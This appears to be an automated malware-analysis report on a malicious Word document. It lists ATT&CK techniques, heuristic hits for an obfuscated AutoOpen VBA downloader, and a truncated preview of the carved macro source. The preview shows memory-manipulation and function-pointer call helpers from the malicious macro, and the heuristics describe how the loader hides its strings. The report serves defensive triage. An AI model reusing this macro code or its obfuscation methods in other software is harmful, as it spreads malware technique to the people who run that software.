MALICIOUS
284
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an 'AutoOpen' macro suggests it executes automatically upon opening. The VBA code appears to be designed to deobfuscate and execute a payload, likely downloading additional malware. The ClamAV detection further confirms its malicious nature.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-8023922-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-8023922-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20639 bytes |
SHA-256: 16d4b675310a0216d7e30ee4c52534b34a089d8c8bfd56796cbd82ee7b8c77ff |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' variant ????????????? variant ?????????
'???????????????????????????
Public Function ref(value_) As Variant
Dim v_ As VariantStruct
MoveMemory v_, value_, LenB(v_)
If (v_.VarType And &H4000) = 0 Then
v_.VarType = v_.VarType Or &H4000
v_.pEntity0 = VarPtr(value_) + (VarPtr(v_.pEntity0) - VarPtr(v_))
End If
MoveMemory ref, v_, LenB(v_)
End Function
'????? variant ?? Empty ????????? variant ??????????
'???????? variant ?????????????????????(????????????????????)?
Public Function Move(value_) As Variant
MoveMemory Move, value_, cSizeOfVariant
MoveMemory value_, Empty, cSizeOfVariant '???????????2??????????
End Function
'???
Public Sub CallFunc2(pObj_ As LongPtr, pFunc_ As LongPtr, ByRef args_, Optional ByRef out_result_, Optional isVbaClass_ As Boolean)
Dim argLength_&: argLength_ = UBound(args_) + 1
Dim argResLength_&: argResLength_ = argLength_ + (Not IsMissing(out_result_)) * isVbaClass_
'?????????
Static types_%()
Static pArgs_() As LongPtr
Select Case True
Case (Not types_) = -1 '????
Dim minLen_&: minLen_ = IIf(argResLength_ > 7, argResLength_, 7) '?? 10 ???????
initArgArray_ minLen_, types_, pArgs_
Case argResLength_ > UBound(types_) + 1
initArgArray_ argResLength_, types_, pArgs_
End Select
'??????
Dim i&
For i = 0 To argLength_ - 1
pArgs_(i) = VarPtr(args_(i))
Next
'??????
If Not isVbaClass_ Then
Dim resultType_ As VbVarType
If Not IsMissing(out_result_) Then resultType_ = vbVariant
Else
If argResLength_ > argLength_ Then
Dim result_
resultArg_.VarType = vbVariant Or &H4000
resultArg_.pEntity0 = VarPtr(result_)
types_(argLength_) = vbVariant Or &H4000
pArgs_(argLength_) = VarPtr(resultArg_)
End If
Dim res_
End If
End Sub
Public Sub CallFunc( _
_
pObj_ As LongPtr, pFunc_ As LongPtr, pArgTop_ As LongPtr, argLength_&, _
_
Optional ByRef out_result_, Optional isVbaClass_ As Boolean _
_
)
Dim argResLength_&: argResLength_ = argLength_ + (Not IsMissing(out_result_)) * isVbaClass_
'?????????
Static types_%()
Static pArgs_() As LongPtr
Select Case True
Case (Not types_) = -1 '????
Dim minLen_&: minLen_ = IIf(argResLength_ > 7, argResLength_, 7) '?? 10 ???????
initArgArray_ minLen_, types_, pArgs_
Case argResLength_ > UBound(types_) + 1
initArgArray_ argResLength_, types_, pArgs_
End Select
'??????
Dim i&
For i = 0 To argLength_ - 1
pArgs_(i) = pArgTop_ + i * cSizeOfVariant
Next
'??????
If Not isVbaClass_ Then
Dim resultType_ As VbVarType
If Not IsMissing(out_result_) Then resultType_ = vbVariant
Else
If argResLength_ > argLength_ Then
Dim result_
resultA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.